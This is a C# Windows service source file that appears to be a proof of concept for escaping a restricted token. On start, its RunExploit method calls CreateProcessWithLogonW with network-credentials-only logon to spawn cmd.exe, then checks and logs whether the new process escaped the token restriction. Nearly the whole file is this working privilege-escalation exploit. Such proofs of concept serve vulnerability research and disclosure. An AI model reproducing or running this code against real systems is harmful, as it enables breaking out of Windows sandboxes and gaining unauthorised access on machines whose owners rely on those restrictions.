﻿using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.ServiceProcess;

namespace DemoService
{
    public class MainService : ServiceBase
    {
        public MainService()
        {
            InitializeComponent();
        }

        private IContainer components = null;

        /// <summary>
        /// Clean up any resources being used.
        /// </summary>
        /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param>
        protected override void Dispose(bool disposing)
        {
            if (disposing && (components != null))
            {
                components.Dispose();
            }
            base.Dispose(disposing);
        }

        /// <summary> 
        /// Required method for Designer support - do not modify 
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            components = new Container();
            ServiceName = "MainService";
        }

        [DllImport("Advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        private static extern bool IsTokenRestricted(IntPtr TokenHandle);

        private const int LOGON_NETCREDENTIALS_ONLY = 2;

        [Flags]
        enum STARTF : uint
        {
            STARTF_USESHOWWINDOW = 0x00000001,
            STARTF_USESIZE = 0x00000002,
            STARTF_USEPOSITION = 0x00000004,
            STARTF_USECOUNTCHARS = 0x00000008,
            STARTF_USEFILLATTRIBUTE = 0x00000010,
            STARTF_RUNFULLSCREEN = 0x00000020,
            STARTF_FORCEONFEEDBACK = 0x00000040,
            STARTF_FORCEOFFFEEDBACK = 0x00000080,
            STARTF_USESTDHANDLES = 0x00000100,
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        private struct STARTUPINFO
        {
            public int cb;
            public string lpReserved;
            public string lpDesktop;
            public string lpTitle;
            public int dwX;
            public int dwY;
            public int dwXSize;
            public int dwYSize;
            public int dwXCountChars;
            public int dwYCountChars;
            public int dwFillAttribute;
            public STARTF dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public int dwProcessId;
            public int dwThreadId;
        }

        [DllImport("Advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        private static extern bool CreateProcessWithLogonW(
          string lpUsername,
          string lpDomain,
          string lpPassword,
          int dwLogonFlags,
          string lpApplicationName,
          string lpCommandLine,
          int dwCreationFlags,
          IntPtr lpEnvironment,
          string lpCurrentDirectory,
          in STARTUPINFO lpStartupInfo,
          out PROCESS_INFORMATION lpProcessInformation
        );

        [DllImport("Advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        private static extern bool OpenProcessToken(
              IntPtr ProcessHandle,
              int DesiredAccess,
              out IntPtr TokenHandle
        );

        private const int MAXIMUM_ALLOWED = 0x02000000;

        private static bool IsRestrictedProcess(IntPtr process)
        {
            if (!OpenProcessToken(process, MAXIMUM_ALLOWED, out IntPtr token))
            {
                throw new Win32Exception();
            }
            return IsTokenRestricted(token);
        }

        public static void RunExploit()
        {
            try
            {
                if (!IsRestrictedProcess(new IntPtr(-1)))
                {
                    Trace.WriteLine("Service not running under a restricted token.");
                    return;
                }

                STARTUPINFO start_info = new STARTUPINFO();
                start_info.cb = Marshal.SizeOf(start_info);
                if (!CreateProcessWithLogonW("user", "domain", "password", LOGON_NETCREDENTIALS_ONLY,
                        null, "cmd.exe", 0, IntPtr.Zero, null, start_info, out PROCESS_INFORMATION proc_info))
                {
                    throw new Win32Exception();
                }

                if (IsRestrictedProcess(proc_info.hProcess))
                {
                    Trace.WriteLine("[ERROR] New process still restricted.");
                }
                else
                {
                    Trace.WriteLine("[SUCCESS] Escaped restricted token.");
                }
            }
            catch (Exception ex)
            {
                Trace.WriteLine($"RunExploit: {ex}");
            }
        }

        protected override void OnStart(string[] args)
        {
            Trace.WriteLine("OnStart");
            RunExploit();
        }

        protected override void OnStop()
        {
            Trace.WriteLine("OnStop");
        }

        static void Main()
        {
            Run(new[] { new MainService() });
        }
    }
}
